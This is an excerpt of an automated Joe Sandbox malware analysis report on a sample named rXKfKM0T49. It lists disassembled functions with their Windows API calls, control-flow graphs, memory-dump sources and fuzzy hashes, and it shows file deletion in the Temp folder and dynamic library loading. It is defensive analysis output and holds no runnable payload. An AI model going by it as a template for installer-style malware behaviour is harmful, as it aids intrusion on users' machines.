                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                            • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                            • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                            • InvalidateRect.USER32(?,00000000,?), ref: 0040534D
                                                                                                            • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                            • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                            • String ID: $M$N
                                                                                                            • API String ID: 1638840714-813528018
                                                                                                            • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                            • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                            • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                            • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                            Function 70091B5F Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 7009121B: GlobalAlloc.KERNEL32(00000040,?,7009123B,?,700912DF,00000019,700911BE,-000000A0), ref: 70091225
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 70091C6B
                                                                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 70091CB3
                                                                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 70091CBD
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70091CD0
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70091DB2
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70091DB7
                                                                                                            • GlobalFree.KERNEL32(?), ref: 70091DBC
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70091FA6
                                                                                                            • lstrcpyW.KERNEL32(?,?), ref: 70092140
                                                                                                            • GetModuleHandleW.KERNEL32(00000008), ref: 700921B5
                                                                                                            • LoadLibraryW.KERNEL32(00000008), ref: 700921C6
                                                                                                            • GetProcAddress.KERNEL32(?,?), ref: 70092220
                                                                                                            • lstrlenW.KERNEL32(00000808), ref: 7009223A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1855880593.0000000070091000.00000020.00000001.01000000.00000004.sdmp, Offset: 70090000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1855819178.0000000070090000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855965653.0000000070094000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1855996025.0000000070096000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70090000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 245916457-0
                                                                                                            • Opcode ID: f63d7e57699737d82890d4fdda7ceed97cfc84bb2aa8a2919b323093f3c610aa
                                                                                                            • Instruction ID: d5a735f8018440df2a0e4f4b6fa7e8dbdf45522bc3fec076411157206baae0dc
                                                                                                            • Opcode Fuzzy Hash: f63d7e57699737d82890d4fdda7ceed97cfc84bb2aa8a2919b323093f3c610aa
                                                                                                            • Instruction Fuzzy Hash: C222AE71E24209DEDB21CFB4C9846EDB7F6FB04B25F21452ED1A6E3280D7705A81EB58
                                                                                                            Function 00405AFA Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 787 405afa-405b20 call 405dc5 790 405b22-405b34 DeleteFileW 787->790 791 405b39-405b40 787->791 792 405cb6-405cba 790->792 793 405b42-405b44 791->793 794 405b53-405b63 call 4063e8 791->794 795 405c64-405c69 793->795 796 405b4a-405b4d 793->796 800 405b72-405b73 call 405d09 794->800 801 405b65-405b70 lstrcatW 794->801 795->792 799 405c6b-405c6e 795->799 796->794 796->795 802 405c70-405c76 799->802 803 405c78-405c80 call 40672b 799->803 804 405b78-405b7c 800->804 801->804 802->792 803->792 810 405c82-405c96 call 405cbd call 405ab2 803->810 808 405b88-405b8e lstrcatW 804->808 809 405b7e-405b86 804->809 811 405b93-405baf lstrlenW FindFirstFileW 808->811 809->808 809->811 827 405c98-405c9b 810->827 828 405cae-405cb1 call 405450 810->828 812 405bb5-405bbd 811->812 813 405c59-405c5d 811->813 815 405bdd-405bf1 call 4063e8 812->815 816 405bbf-405bc7 812->816 813->795 818 405c5f 813->818 829 405bf3-405bfb 815->829 830 405c08-405c13 call 405ab2 815->830 819 405bc9-405bd1 816->819 820 405c3c-405c4c FindNextFileW 816->820 818->795 819->815 823 405bd3-405bdb 819->823 820->812 826 405c52-405c53 FindClose 820->826 823->815 823->820 826->813 827->802 831 405c9d-405cac call 405450 call 4061ae 827->831 828->792 829->820 832 405bfd-405c06 call 405afa 829->832 840 405c34-405c37 call 405450 830->840 841 405c15-405c18 830->841 831->792 832->820 840->820 844 405c1a-405c2a call 405450 call 4061ae 841->844 845 405c2c-405c32 841->845 844->820 845->820
                                                                                                            APIs
                                                                                                            • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405B23
                                                                                                            • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405B6B
                                                                                                            • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405B8E
                                                                                                            • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405B94
                                                                                                            • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76F92EE0,00000000), ref: 00405BA4
                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                            • API String ID: 2035342205-3222569857
                                                                                                            • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                            • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                            • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                            • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                            Function 00406AF2 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                            • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                            • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                            Function 0040672B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76F92EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76F92EE0), ref: 00406736
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID: xgB
                                                                                                            • API String ID: 2295610775-399326502
                                                                                                            • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                            • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                            • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                            Function 00401E49 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$EnableShow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1136574915-0
                                                                                                            • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                            • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                            • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                            • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                                                                            Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 265 404037-40404c 262->265 266 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->266 263->262 264 403eaa-403eb3 263->264 269 403eb5-403ec2 SetWindowPos 264->269 270 403ec8-403ecb 264->270 267 40408c-404091 call 4043ab 265->267 268 40404e-404051 265->268 266->265 280 404096-4040b1 267->280 272 404053-40405e call 401389 268->272 273 404084-404086 268->273 269->270 275 403ee5-403eeb 270->275 276 403ecd-403edf ShowWindow 270->276 272->273 294 404060-40407f SendMessageW 272->294 273->267 279 40432c 273->279 281 403f07-403f0a 275->281 282 403eed-403f02 DestroyWindow 275->282 276->275 289 40432e-404335 279->289 287 4040b3-4040b5 call 40140b 280->287 288 4040ba-4040c0 280->288 284 403f0c-403f18 SetWindowLongW 281->284 285 403f1d-403f23 281->285 290 404309-40430f 282->290 284->289 292 403fc6-403fd4 call 4043c6 285->292 293 403f29-403f3a GetDlgItem 285->293 287->288 297 4040c6-4040d1 288->297 298 4042ea-404303 DestroyWindow EndDialog 288->298 290->279 296 404311-404317 290->296 292->289 299 403f59-403f5c 293->299 300 403f3c-403f53 SendMessageW IsWindowEnabled 293->300 294->289 296->279 302 404319-404322 ShowWindow 296->302 297->298 303 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 297->303 298->290 304 403f61-403f64 299->304 305 403f5e-403f5f 299->305 300->279 300->299 302->279 331 404126-40412b 303->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 303->332 310 403f72-403f77 304->310 311 403f66-403f6c 304->311 309 403f8f-403f94 call 404338 305->309 309->292 314 403fad-403fc0 SendMessageW 310->314 316 403f79-403f7f 310->316 311->314 315 403f6e-403f70 311->315 314->292 315->309 319 403f81-403f87 call 40140b 316->319 320 403f96-403f9f call 40140b 316->320 329 403f8d 319->329 320->292 328 403fa1-403fab 320->328 328->329 329->309 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->280 351 4041ff-404201 340->351 351->280 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->290 355 404244-404271 CreateDialogParamW 353->355 354->279 356 404219-40421f 354->356 355->290 357 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 355->357 356->280 358 404225 356->358 357->279 363 4042d0-4042e8 ShowWindow call 4043ab 357->363 358->279 363->290
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                            • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                            • DestroyWindow.USER32 ref: 00403EF3
                                                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00403FF9
                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                            • SendMessageW.USER32(0000040F,00000000,?,?), ref: 0040406E
                                                                                                            • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                            • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                                            • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404178
                                                                                                            • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                            • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404197
                                                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                            • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                            • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                            • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                            • String ID: (7B
                                                                                                            • API String ID: 3282139019-3251261122
                                                                                                            • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                            • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                            • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                            • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                                                                                            Function 00403AD8 Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 378 403b5e-403b87 call 403dae call 405dc5 369->378 375 403b53-403b59 lstrcatW 370->375 376 403b3d-403b4e call 4062b6 370->376 375->378 376->375 384 403c19-403c21 call 405dc5 378->384 385 403b8d-403b92 378->385 391 403c23-403c2a call 40640a 384->391 392 403c2f-403c54 LoadImageW 384->392 385->384 386 403b98-403bb2 call 4062b6 385->386 390 403bb7-403bc0 386->390 390->384 393 403bc2-403bc6 390->393 391->392 395 403cd5-403cdd call 40140b 392->395 396 403c56-403c86 RegisterClassW 392->396 400 403bd8-403be4 lstrlenW 393->400 401 403bc8-403bd5 call 405cea 393->401 408 403ce7-403cf2 call 403dae 395->408 409 403cdf-403ce2 395->409 397 403da4 396->397 398 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 396->398 406 403da6-403dad 397->406 398->395 402 403be6-403bf4 lstrcmpiW 400->402 403 403c0c-403c14 call 405cbd call 4063e8 400->403 401->400 402->403 407 403bf6-403c00 GetFileAttributesW 402->407 403->384 412 403c02-403c04 407->412 413 403c06-403c07 call 405d09 407->413 419 403cf8-403d12 ShowWindow call 406752 408->419 420 403d7b-403d83 call 405523 408->420 409->406 412->403 412->413 413->403 427 403d14-403d19 call 406752 419->427 428 403d1e-403d30 GetClassInfoW 419->428 425 403d85-403d8b 420->425 426 403d9d-403d9f call 40140b 420->426 425->409 429 403d91-403d98 call 40140b 425->429 426->397 427->428 432 403d32-403d42 GetClassInfoW RegisterClassW 428->432 433 403d48-403d6b DialogBoxParamW call 40140b 428->433 429->409 432->433 436 403d70-403d79 call 403a28 433->436 436->406
                                                                                                            APIs
                                                                                                              • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                              • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                            • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76F93420,00435000,00000000), ref: 00403B59
                                                                                                            • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                                            • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                            • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                                            • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                              • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
                                                                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                            • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                            • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1813079433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1813067427.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813092329.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813103926.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1813161725.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_rXKfKM0T49.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                            • String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                            • API String ID: 1975747703-1350935784
                                                                                                            • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
